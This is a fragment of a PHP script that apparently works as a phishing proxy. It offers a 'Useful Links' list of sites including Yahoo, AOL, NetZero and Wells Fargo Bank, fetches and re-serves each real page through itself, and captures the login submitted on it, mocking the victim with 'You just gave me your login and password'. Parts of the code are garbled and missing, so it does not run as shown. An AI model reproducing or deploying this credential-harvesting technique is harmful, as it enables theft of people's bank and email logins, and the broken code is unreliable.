will work $dest[]="Slashdot"; $link[]="http://www.slashdot.org"; $dest[]="Kuro5hin"; $link[]="http://www.kuro5hin.org"; $dest[]="Yahoo!"; $link[]="http://my.yahoo.com"; $dest[]="America On-Line"; $link[]="http://www.aol.com"; $dest[]="NetZero"; $link[]="http://webmail.netzero.net"; $dest[]="Wells Fargo Bank"; $link[]="http://www.wellsfargo.com"; $dest[]="Neverwinter Nights"; $link[]="http://nwn.bioware.com"; # has somebody submitted our form? if (isset($the_site_you_really_wanted)) { print "\n"; print "Be afraid. Be very afraid.\n"; print "

\n"; print "You just gave me your login and password for the following Web site:\n"; print "

\n"; print "

\n"; print "Have a nice day!\n"; print "\n"; exit; } # if one of our links was not submitted, print the list of links if (!isset($p)) { print "\n"; print "Useful Links\n"; print "\n"; print "\n"; } else { # here we go ... some eager sucker has followed one of our links # first, parse the URL in case we need to supply a base href later $url = parse_url($p); $base_href = $url[scheme] . "://" . $url[host] . "/"; # go grab the page $handle = fopen ($p, "r"); $contents = ""; do { $chunk = fread($handle, 8192); if (strlen($chunk) == 0) { break; } $contents .= $chunk; } while(true); fclose ($handle); # stick it all in $data $data = explode("\n", $contents); # go through $data line by line for ($i=0; $i"; } # dump the compromised page to the client's browser foreach ($data as $line) { print "$line"; print "\n"; if (stristr($line, "\n"; } } } ?>